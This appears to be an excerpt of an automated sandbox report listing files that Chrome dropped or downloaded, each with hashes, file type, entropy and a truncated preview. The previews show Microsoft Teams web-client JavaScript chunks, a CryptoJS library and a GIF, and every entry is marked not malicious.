                                                                                                                                                                                                                                                                            SHA-512:98B6AAB9BA7E99F71AE92C05FC1582A5CC0506287CFC09D13EF91D3147E445AC4121395C850058BCAC02E2324353E264A99CBB68AFF9014CB1D8FF12C1109732
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[811751],{811751:(e,a,t)=>{t.d(a,{V:()=>Ve});var n=t(513432),r=t(48374),i=t(589256),o=t(35871);let s;function l(e,a){if(e){if(s)return void(s=e);s=e,a&&a.requestAnimationFrame((()=>{s&&s.focus(),s=void 0}))}}var f=t(517822),c=t(312798),d=t(754814),u=t(526521),m=t(796831),y=t(411947);const g=(e,a,t)=>{let n=[...e];return a&&(n=n.filter((e=>(0,d.F4)(e,a)>=0))),t&&(n=n.filter((e=>(0,d.F4)(e,t)<=0))),n},b=(e,a)=>{const{minDate:t}=a;return!!t&&(0,d.F4)(t,e)>=1},h=(e,a)=>{const{maxDate:t}=a;return!!t&&(0,d.F4)(e,t)>=1},v=(e,a)=>{const{restrictedDates:t,minDate:n,maxDate:r}=a;if(!t&&!n&&!r)return!1;return t&&t.some((a=>(0,d.H$)(a,e)))||b(e,a)||h(e,a)};var k=t(336290);const B=e=>{const{showWeekNumbers:a,strings:t,firstDayOfWeek:r,allFocusable:i,weeksToShow:o,weeks:s,classNames:l}=e,c=t.shortDays.slice();let d=-1;const m=s[1];for(let e=0;e<s[1].length;e++)if(1===m[e].originalDate.getDa
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (36879)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):36987
                                                                                                                                                                                                                                                                            Entropy (8bit):5.379410624740036
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:yRWn0S3+zdj+ZSt/oz3lhNBbSCeMcxNDTHmwHQoUeYVu:ygnr+AU/ozTNBbSC9eN
                                                                                                                                                                                                                                                                            MD5:EABD9EE763EBBE8CC6821242AD8968B7
                                                                                                                                                                                                                                                                            SHA1:B70611C7EDBC1D933213EA7BF9A84A957F797CB4
                                                                                                                                                                                                                                                                            SHA-256:D483B2A08866685564D04498B99A02C03D2A2690F4F2A03E78E062AA761FD44B
                                                                                                                                                                                                                                                                            SHA-512:5004261B5BF175EBAD0D50C794957AFD8FAE1E92B86D4BAF8B48BEB0C540FBE62FA36A7348B0ECA2C40457FAEFBB4AC8F7ABC2C42CCDC7D1D4DE8EBD658B7740
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[602438],{562341:(e,t,n)=>{n.d(t,{V:()=>r});var o=n(953543),r=function(e){return{attributes:{root:{role:"button"===e.as?void 0:"button",tabIndex:"button"===e.as||e.disabled?void 0:0,disabled:"button"===e.as?e.disabled:void 0,"aria-disabled":e.disabledFocusable}},keyActions:{root:Object.assign({},"button"!==e.as&&"a"!==e.as&&{performClick:{keyCombinations:[{keyCode:o.rC.Enter},{keyCode:o.ZG}]}})}}}},928879:(e,t,n)=>{n.d(t,{Z:()=>c});var o=n(55543),r=n.n(o),i=n(666293),a=n.n(i),s=n(953543),c=function(e){var t,n,o=a()(e.on)?e.on:[e.on],i=e.tabbableTrigger?{tabIndex:u("tabIndex",e,0)}:void 0;i&&(i["aria-haspopup"]=null!=(t=e.trigger)&&t.props.hasOwnProperty("aria-haspopup")?null==(n=e.trigger)?void 0:n.props["aria-haspopup"]:"dialog");return{attributes:{trigger:Object.assign({},i),popup:{role:e.trapFocus?"dialog":e.inline?void 0:"complementary","aria-modal":!!e.trapFocus||void 0,"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (51711)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):51819
                                                                                                                                                                                                                                                                            Entropy (8bit):5.396916250619922
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:ejcrcWCLys9Pod8X5cceHZGbckMnXd1c5xcVJkyOz42syyPMVb2+vvDWLIFKmK6:LeljdZWydVSlmh
                                                                                                                                                                                                                                                                            MD5:E9BAFB2820BC7922B44E12BCD523B1D1
                                                                                                                                                                                                                                                                            SHA1:BEA7DDF3E853CE508AAC415553BCE6E7635F6A23
                                                                                                                                                                                                                                                                            SHA-256:A995D7E16B5D4549A94E28CAFC569E140431135922F410C1965B5EE80353F007
                                                                                                                                                                                                                                                                            SHA-512:11303050E451CC318A7F6CAD193595A20330B093A71566E0DB92CBCF58CFF55CB52A70170FD4D8C0F9A2E41D162E3F06BE3A94F8DBB2C6119C2F7D101FDB33CE
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[616161],{333890:(e,r,t)=>{"use strict";t.d(r,{P:()=>o});var n=t(746548),a=t(513432),o=a.createContext((0,n.c)())},155259:(e,r,t)=>{"use strict";t.d(r,{Y:()=>n});var n=function(){function e(){this.performance=void 0,this.enabled=void 0,this.performance={},this.enabled=!0}return e.prototype.reset=function(){this.performance={}},e}()},746548:(e,r,t)=>{"use strict";t.d(r,{c:()=>lr});var n=t(640901),a=t.n(n),o=t(848949),i=t(828770),s=t.n(i),c=t(49102);function u(e,r,t){var n=arguments.length>3&&void 0!==arguments[3]?arguments[3]:{};return e.plugins.length>0?(0,c.A)(e.plugins,(function(r,a){return a(r,t,e,n)}),r):r}var l="RULE",f="KEYFRAME",d="FONT",p="STATIC",h="CLEAR",v=/^(:|\[|>|&)/;function g(e){return v.test(e)}function m(e){return"&"===e.charAt(0)?e.slice(1):e}function b(e){return"@media"===e.substr(0,6)}function y(e,r){return 0===e.length?r:e+" and "+r}function A(e){return"@supports"===e
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (551)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):666
                                                                                                                                                                                                                                                                            Entropy (8bit):5.4222694182392575
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:12:/4p3sp38cFziZm5P5immRXBF5Dd2Fse+mMcQZghsDzrhV2zLWEZJg59E2HiS6Mm:wp3sp38cxsGxSF1Dd2Fse+mMcQTrD+CO
                                                                                                                                                                                                                                                                            MD5:1B6F6EA06F39E90E233B1633C91D9077
                                                                                                                                                                                                                                                                            SHA1:A218DF4B47D55625E01DB46BDD1F2E19F5256889
                                                                                                                                                                                                                                                                            SHA-256:A4558EE44DEAA7519AAB650EC7455BA8975030196CCD1663B2826E0FD602FFD4
                                                                                                                                                                                                                                                                            SHA-512:DF591C4BCBD03B1D8F790AD9C1003076A668A5F5DA86F85194DC58960963B8E34F8C41BC67FDD63D65E72AAE33A2A16754264760F5BA78B7A6FFC1244F09950B
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/r_data-schema-de88db18bfc98298.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[790222],{6751:(e,t,a)=>{a.r(t),a.d(t,{typeDefs:()=>r,resolvers:()=>s.u});var r=a(876152),s=a(701426)},701426:(e,t,a)=>{a.d(t,{u:()=>n});var r=a(425104),s=a(699899);const n={BigInt:s.BM,DateTime:s.Ps,JSONData:s.kJ,ScalarEnumString:new r.Ag({name:"ScalarEnumString",description:"ScalarEnumString custom scalar type used for object that can use toString",parseValue:e=>e.toString(),serialize:e=>e.toString(),parseLiteral:e=>e&&e.value})}}}]);.//# sourceMappingURL=https://local.teams.office.com/sourcemaps/hashed-assets/r_data-schema-de88db18bfc98298.js.map
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (65484), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):127393
                                                                                                                                                                                                                                                                            Entropy (8bit):4.691765049778823
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:2EQAIJqdovv9QFXHpVHWbA+rfQDBmDoGVuQfOm5/Zh+a0C:vQAHdivK1HWbA+rfaBm+Q2mV5
                                                                                                                                                                                                                                                                            MD5:D7D39CB4C24812041ECFE140BFC00A45
                                                                                                                                                                                                                                                                            SHA1:9417A74D1F8BA5C853C80EB617BAEB53C77CAF7E
                                                                                                                                                                                                                                                                            SHA-256:B5E176F95173A8561F51ECF29D92F0DB810B951496027E48EBAE65FC2B918778
                                                                                                                                                                                                                                                                            SHA-512:C0DB23A4ED5486A0135CBE43F44BE20B61A6647FB0BB71F45EAAFF5F411264C89C827E2C6BEE19D8BAAF2D25DFD4E9804863EF6D757A57505498BCCB00EC8204
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[316318],{436214:(e,a,t)=>{t.r(a),t.d(a,{default:()=>n});const n={namespace:"teamsAndChannels",locale:"en-us",translations:{activity_goto_team_title:"Go to the team",activity_tab_team_section_header:"Join teams {{firstName}} is active in",activity_tab_team_section_header_unresolved_user:"Join teams this person is active in",actor_reason_string_for_mention_team_or_channel:"{{actor}} mentioned {{channel}}",actor_reason_string_for_team_expire:"{{team_name}} is expiring soon",actor_reason_string_for_team_membership_change:"{{actor}} made you an owner of {{team_name}}",actor_reason_string_for_team_membership_change_in_a_private_or_shared_channel:"{{actor}} made you an owner of a channel",actor_reason_string_for_team_renewal:"{{team_name}} was renewed",add_guest_people_picker_header:"Add {{email}} as a guest?",add_member_close_button_aria_label:"Close",add_member_dialog_subtitle_def
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):3886746
                                                                                                                                                                                                                                                                            Entropy (8bit):5.391995387658667
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:49152:bFEqeRKTEJpWXa2Pyr7WrZ9s4SwwP2BIoortbDhqzAVNHI/Jwjka+O4jdTtk18p9:oVs1
                                                                                                                                                                                                                                                                            MD5:28623544BBB4E5FC02CD8DAFE548322F
                                                                                                                                                                                                                                                                            SHA1:8C8EB4A60C427BD5D0F60BF5EA4AD485D78B773E
                                                                                                                                                                                                                                                                            SHA-256:89416D1F024D76DD96F7ECDE58541D0F0B8B9382EE8E435AD64B42E89DD10666
                                                                                                                                                                                                                                                                            SHA-512:FDB5EBDA54583DC84EB4A5B7F980AD28FDAAA83F60FC96107BD9ACA7C754493E353A5BAA3C8A62B5BB7A0BE81BC51F12DF33DFD868D6A3507B94DB12E5C3366F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[805610],{211014:(e,t,n)=>{"use strict";n.d(t,{b:()=>i});const i=(0,n(965804).O)({isStudentAvatar:{Bf4jedk:"f1ohpo60"},isParentAvatar:{Bf4jedk:"ff9fk16"}})},516404:(e,t,n)=>{"use strict";function i(e){return'<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>','<link\n rel="shortcut icon"\n type="image/x-icon"\n id="teams-favicon"\n href="[[staticsPath]]/evergreen-assets/icons/microsoft_teams_logo_refresh.ico"\n/>'}n.d(t,{A:()=>i})},10247:(e,t,n)=>{"use strict";function i(e){var t="";Array.prototype.join;return t+="<style>\n .preload-title-bar-trim {\n ","mac"===e.osPlatform?t+="\n --preload-title-bar-background-color: rgb(98, 100, 167);\n ":t+="\n --preload-title-bar-background-color: rgb(70, 71, 117);\n ",t+='\n\n background-color: var(--preload-title-bar-bac
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (29175)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):29283
                                                                                                                                                                                                                                                                            Entropy (8bit):6.0986751003568695
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:33bIUDP6rukgBSCbljklj/Djkn5qkIWRwxNk+UysJHYFwrs7:MUbW/OdJjojrjtHk+6t6
                                                                                                                                                                                                                                                                            MD5:53A5C6EBE38F15D4226EC6CB4AC1A08B
                                                                                                                                                                                                                                                                            SHA1:BA0DB03E262394B04AD33B8FA69844C079D8906C
                                                                                                                                                                                                                                                                            SHA-256:D46EA577C50DFAB51F1AABF584DC2D0FADE0CCD4B73DF82FF90786B71F6025E8
                                                                                                                                                                                                                                                                            SHA-512:601FBE45B688495CEC2AC199FAE5BD2B02EE29FEEB0E1B94713305BBED320E4FAD32A46B094E300C4018DBB7BEEE1BDDD9A670277A184FDE502C91F941FEF31C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[780368],{98332:(M,e,A)=>{A.d(e,{p:()=>g});var D=A(469754),N=A.n(D);class I extends(N()){constructor(M,e,A={sanitizeBatchLoadFn:!0}){super(A.sanitizeBatchLoadFn?function(M,e){return async function(A){const D=await M(A);return A.forEach(((M,A)=>{const N=D[A];if(null==N||N instanceof Error||"object"==typeof M)return;if(M!==e(N))throw new Error(`DataLoader must be constructed with a function which accepts Array<key> and returns Promise<Array<value>>, where the order of values corresponds to the order of keys from the input array. Value and key at index ${A} do not match: (\n\nKey:\n${M})\n\nValue:\n${N}`)})),D}}(M,e):M,A),this.keyFn=e}getKey(M){return this.keyFn(M)}}function a(M){return M instanceof I}class g{constructor(M,e){this.context=M,this.dataLoaderImplementations=new Map,this.DATALOADER_BY_ID="BY_ID",this.isNode=M=>null!==M&&!(M instanceof Error),this.getId=this.getId.bin
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):79979
                                                                                                                                                                                                                                                                            Entropy (8bit):5.325944634609262
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:1536:+Zm8MUUxRA9XGgvSrL43eCn6964I2H1g7/FJqU:+Zm8MGeSP4I2HG7/FJ5
                                                                                                                                                                                                                                                                            MD5:0909459D3BE9EACEA67C6631837AFB4F
                                                                                                                                                                                                                                                                            SHA1:A832586C4C1CBB2D1C5711599A25E092E6E4AE31
                                                                                                                                                                                                                                                                            SHA-256:C4315BE83C86083459298EEC9F198176CEB64EF841B2E95EEC8D3C2842F729DF
                                                                                                                                                                                                                                                                            SHA-512:5611037E17EECA02224BDF90D1148E3B88287F15FCE7E3CF3BD5B6908BC33C856F11F17F4A1CF83FD3C590305C3011C80362981D5DAD292821CE810C7A4D63C1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[812302],{863344:(t,e,n)=>{"use strict";n.d(e,{N:()=>s,ZP:()=>u,KB:()=>a});var r=n(795800),i={},o={};function a(t,e){var n=c(t,e);return i[n]}function s(t,e,r,a){var s=c(e,a),u=i[s];if(u&&!r)return Promise.resolve(u);var l=o[s];if(l&&!r)return l;if(!t)return Promise.reject("Missing bootstrapper config");var d=n.e(336689).then(n.bind(n,538774)).then((function(e){return e.initialize(t).then((function(t){return i[s]=t,t}))}));return o[s]=d,d}function u(t,e){var n=c(t,e);delete i[n],delete o[n]}function c(t,e){var n;return[(0,r.Et)(t),null===(n=null==e?void 0:e.getCacheKeySuffix)||void 0===n?void 0:n.call(e)].join("_")}},795800:(t,e,n)=>{"use strict";function r(t,e){var n=e||{};return[t,n.userAadObjectId,n.tenantAadObjectId].join("-")}function i(t){return r("Cortex.TopicsCapabilities",t)}function o(t){return r("Cortex.TopicsSdks",t)}n.d(e,{et:()=>r,MP:()=>i,Et:()=>o})},897604:(t,e,n)=>{"use st
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (15539)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):15646
                                                                                                                                                                                                                                                                            Entropy (8bit):5.464935671052335
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:4mF38qcttQl2+byDjOtG0RcyXBQsArZSJ4LiKCpuX3muSmOgU0il5P7VKhS:4mFQS2rDjOtG0RcqBQpVSJ4LiZpW2uSt
                                                                                                                                                                                                                                                                            MD5:FE381C0577EBD118A0B84E4F03A185B9
                                                                                                                                                                                                                                                                            SHA1:7E34B7E9E38BF67DB5EA2CD3FDDA51E9D18CB6EB
                                                                                                                                                                                                                                                                            SHA-256:57C1E0D11A72D12D1D64042AAA345579CA8CED220692F54843DBB6533107583C
                                                                                                                                                                                                                                                                            SHA-512:59871504796215CC0F8A0B4A28E6668716D4B37469968691CF3D4492742CC6284FC9A03EF6E1885B54BE3565635BC7BF0BDD288158CA0F4F2024EAD235C2ABE4
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[74755],{851706:(e,t,n)=>{n.d(t,{E:()=>M});var r=n(513432),o=n(48374),i=n(883027),a=n(602835),l=n(691478),c=n(164093),u=n(716300),s=n(250452),d=n(478304),f=n(31152),v=n(35871),p=n(103735);const m=(0,p.D)("r6pzz3z",null),b=(0,p.D)("r144vlu9",null);var h=n(115170),y=n(123082);const g=[{opacity:0},{opacity:1}],w=(0,h.$)({enter:{keyframes:g,easing:y.TV.curveLinear,duration:y.TV.durationGentle},exit:{keyframes:[...g].reverse(),easing:y.TV.curveLinear,duration:y.TV.durationGentle}});var k=n(712944);const D=(e,t)=>{const n=(0,k.Z)(),p=(0,f.e4)((e=>e.modalType)),h=(0,f.e4)((e=>e.isNestedDialog)),y=(0,f.e4)((e=>e.modalAttributes)),g=(0,f.e4)((e=>e.dialogRef)),D=(0,f.e4)((e=>e.requestOpenChange)),E=(0,f.e4)((e=>e.dialogTitleId)),B=(0,f.e4)((e=>e.open)),C=(0,a.D)((t=>{var n,r;(0,l.g)(e.backdrop)&&(null===(n=(r=e.backdrop).onClick)||void 0===n||n.call(r,t));"modal"!==p||t.isDefaultPrevent
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):2672
                                                                                                                                                                                                                                                                            Entropy (8bit):6.640973516071413
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                                                                                                                                                                                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                                                                                                                                                                                                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                                                                                                                                                                                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                                                                                                                                                                                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif
                                                                                                                                                                                                                                                                            Preview:GIF89a`............!..NETSCAPE2.0.....!.......,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....0.............<....[.\K8j.tr.g..!.......,....3............^;.*..\UK.]\.%.V.c...!.......,....7........`....lo...[.a..*Rw~i...!.......,....;........h.....l.G-.[K.,_XA]..'g..!.......,....?........i.....g....Z.}..)..u...F..!.......,....C...............P.,nt^.i....Xq...i..!.......,....F...........{^b....n.y..i...\C.-...!.......,....H..............R...o....h.xV!.z#...!.......,"...L.............r.jY..w~aP(.......[i...!.......,(...N.............r....w.aP.j.'.)Y..S..!.......,....H.........`......hew..9`.%z.xVeS..!.......,5...A.........`...\m.Vmtzw.}.d.%...Q..!.......,9...=.........h......3S..s.-W8m...Q..!.......,A...5.........h.....N...:..!..U..!.......,H.............h....M.x...f.i.4..!.......,O...'.........i...tp......(..!.......,X.............j...@.x....!.......,].............j..L..3em..!.......,e.............`......!.......,n..............{i..!..
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (26062)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):26168
                                                                                                                                                                                                                                                                            Entropy (8bit):5.296571517037529
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:XK0TO27wdekqJ/zJnhWh45hvim95mFADabEUjt7BA:Oe1J/VhWh45hf7Dazjty
                                                                                                                                                                                                                                                                            MD5:A46EFC647DE93EE6A18BD892F4A95BB2
                                                                                                                                                                                                                                                                            SHA1:4FFD23C55B16482BE0AE5A545C0977EC7AC78143
                                                                                                                                                                                                                                                                            SHA-256:2968994431F249465FF67033C9A9A43132B38FE0B982ED7CCF4AF39909604BD6
                                                                                                                                                                                                                                                                            SHA-512:CCA8C183453DDC9D52E1A104248AAA563A988CAEAAEEA4587454E14D45770ED8CA7F878D6177B4E66F18E0ED284127EC73C3C0842E2843ABD9CC547C6BF9C781
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[7747],{799323:(e,n,t)=>{t.d(n,{x:()=>a});var r=t(513432),o=function(e){return void 0===e},a=function(e){var n=r.useState(o(e.defaultValue)?e.initialValue:e.defaultValue),t=n[0],a=n[1],i=o(e.value)?t:e.value,l=r.useRef(i);r.useEffect((function(){l.current=i}),[i]);var s=r.useCallback((function(e){l.current="function"==typeof e?e(l.current):e,a(l.current)}),[]);return[i,s]}},783943:(e,n,t)=>{t.d(n,{D:()=>a});var r=t(513432),o=t(338400),a=function(e){var n=r.useRef((function(){throw new Error("Cannot call an event handler while rendering")}));return(0,o.E)((function(){n.current=e}),[e]),r.useCallback((function(){return n.current.apply(void 0,arguments)}),[n])}},182812:(e,n,t)=>{t.d(n,{a:()=>o});var r=t(513432);function o(){for(var e=arguments.length,n=new Array(e),t=0;t<e;t++)n[t]=arguments[t];var o=r.useCallback((function(e){o.current=e;for(var t=0,r=n;t<r.length;t++){var a=r[t
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):47992
                                                                                                                                                                                                                                                                            Entropy (8bit):5.605846858683577
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                                                                                            MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                                                                                            SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                                                                                            SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                                                                                            SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (21912)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):22019
                                                                                                                                                                                                                                                                            Entropy (8bit):5.493884334447431
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:+GBvGvFiE5p3r+T4JeoktvPIYKLioLLJWfvAoR1CbQw2+fEwCiFLKzR3LzSmWvKV:+GBvGvFiE5pb+T4JeoktvPIYKLioLLJy
                                                                                                                                                                                                                                                                            MD5:3B64EA431903F44AD5097AB64EB191AF
                                                                                                                                                                                                                                                                            SHA1:7D6D71D58B698E2C4113D89AE4EC421C68D0774F
                                                                                                                                                                                                                                                                            SHA-256:38EA39B025AB3CE7D81F4E3E9D1F5186D9ECD2E2F88C6CD6695F00368FE204CA
                                                                                                                                                                                                                                                                            SHA-512:6F88011B4916F9C69253C722AD0C1CAAC7C5AFE8506A4619C5DED2DCDE08E78BE8B09C68A06D95D2F6B8C2DF55129551E7107117D0A70F98378425DE693BE0B9
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[67835],{117695:(e,n,t)=>{var i,s;t.d(n,{I:()=>i,V:()=>s}),function(e){e.Compose="Compose",e.MessagePane="MessagePane",e.DeeplinkedMessage="DeeplinkedMessage",e.DoNotMove="DoNotMove",e.PeoplePickerInput="people-picker-input"}(i||(i={})),function(e){e.LeftRailSelectedItem="LeftRailSelectedItem",e.DoNotMove="DoNotMove"}(s||(s={}))},199631:(e,n,t)=>{var i;t.d(n,{m:()=>i}),function(e){e.APP_SWITCHER_CONFIRMATION_RENDERED="app-switcher-confirmation-renderer",e.AUDIO_DEVICE_SETTINGS_RENDERED="audio-device-settings-rendered",e.CALENDAR_HEADER_RENDERED="calendar-header-rendered",e.CALENDAR_VIEW_RENDERED="calendar-view-rendered",e.CALENDAR_SF_HEADER_RENDERED="calendar-sf-header-rendered",e.CALENDAR_SF_VIEW_RENDERED="calendar-sf-view-rendered",e.CALENDAR_SF_TRACKING_VIEW_RENDERED="calendar-sf-tracking-view-rendered",e.CALL_FORWARDING_SETTINGS_RENDERED="call-forwarding-settings-rendered"
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (9414)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):9522
                                                                                                                                                                                                                                                                            Entropy (8bit):4.450515488425317
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:192:bmWQhC/9a/SV5Kdgcy6E4tFO1R9QJjseVtrTeGoPxG/0VVi9KE:bQC8KVUC4CQaeVtHoPk/0VViYE
                                                                                                                                                                                                                                                                            MD5:D3534574FC74BF606194A4B77757838A
                                                                                                                                                                                                                                                                            SHA1:21F552D18370063B69051D642D90F6D4097FBF74
